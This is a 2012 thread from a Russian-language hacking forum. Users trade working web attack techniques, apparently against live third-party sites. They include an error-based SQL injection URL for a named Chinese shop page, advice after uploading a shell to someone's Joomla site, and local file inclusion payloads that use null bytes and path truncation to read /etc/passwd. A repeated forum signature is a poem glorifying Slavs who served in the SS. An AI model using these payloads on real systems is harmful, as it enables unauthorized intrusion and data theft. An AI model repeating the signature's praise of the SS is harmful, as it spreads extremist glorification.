ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.09.2012, 22:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Halahack
Halahack said:
http://lonyung.com.cn/buy.php?id=`76
http://lonyung.com.cn/buy.php?id=76 and (select 1 from(select count(*),concat( version(),0x00,floor(rand(0)*2)) x from nformation_schema.tables group by x)a)
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
29.09.2012, 22:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Halahack
Halahack said:
нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by
=
1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?
Красным выделено, ЧТО за знак равно?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
29.09.2012, 23:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Та то вместо + случайно поставил.
|
|
|
|
29.09.2012, 23:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
18364
Репутация:
0
|
|
Прошу помощи
расскажите про уязвимость HTTP Verb Tampering
|
|
|
|
29.09.2012, 23:42
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от diny
diny said:
Прошу помощи
расскажите про уязвимость HTTP Verb Tampering
google: "уязвимость HTTP Verb Tampering"
сразу же первая ссылка с рассказом об этой уязвимости.
Сообщение от None
http://www.ptsecurity.ru/ics/%D0%AE.%D0%93%D0%BE%D0%BB%D1%8C%D1%86%D0%B5%D0%B2_ %D0%A3%D1%8F%D0%B7%D0%B2%D0%B8%D0%BC%D0%BE%D1%81%D 1%82%D0%B8_web_%D1%81%D0%BB%D0%BE%D0%B6%D0%BD%D1%8 B%D0%B5_%D1%81%D0%BB%D1%83%D1%87%D0%B0%D0%B8.pdf
|
|
|
|
30.09.2012, 02:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
залил shell на сайт joomla теперь вижу все файлы на сервере,подскажите пожалуйста как узнать под каким пользователем и с какими правами я там нахожусь? Некоторые папки и файлы не могу просматривать,такие как master.passwd и т.д,файл passwd просматривать могу.Извените за ламерский вопрос,новичёк.Спасибо. |
|
|
|
30.09.2012, 11:24
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Sat-hacker
Sat-hacker said:
залил
shel
l на сайт joomla теперь вижу все файлы на сервере,подскажите пожалуйста как узнать под каким пользователем и с какими правами я там нахожусь? Некоторые папки и файлы не могу просматривать,такие как master.passwd и т.д,файл passwd просматривать могу.Извените за ламерский вопрос,новичёк.Спасибо. Верхний левый угол - Group = , Id =
Или команда в конcоли
whoami
id
|
|
|
|
30.09.2012, 13:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
43360
Репутация:
0
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.html'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Почему то после первого обращения к include.php?file=../../../../../../../etc/passwd%00 вылетает ошибка:
Код:
Code:
Warning: include(): Failed opening '../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2
А после последующих:
Код:
Code:
Warning: include(../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2
То есть нулл-байт не обрезает расширение. Приходится чистить кэш или перезапускать браузер.
magic_quotes_gpc = off. |
|
|
|
30.09.2012, 14:20
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885
Репутация:
34
|
|
попробуй вместо нулл байта 4096 слешей
../../../../../../../etc/passwd/////////////////////////////...
|
|
|
|
30.09.2012, 14:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
43360
Репутация:
0
|
|
Сообщение от RazyKK
RazyKK said:
попробуй вместо нулл байта 4096 слешей
../../../../../../../etc/passwd/////////////////////////////...
Только хотел про это написать) Подставил вместо нулл-байта 2500 повторений /.
Получилась такая строка ../../../../../../../etc/passwd/./././.[...]/./.
В таком случае все время ошибка:
Код:
Code:
Warning: include(../../../../../../../etc/passwd/././././.[...]/././././././. in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd/./././././././.[...]/./././././. in /var/www/include.php on line 2
P.S. просто 4096 слэшей не будут работать, т.к. php обрабатывает их не так, как /. . /. удаляется полностью, а // меняются на /, в итоге в конце получим путь не к файлу, а к директории.
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
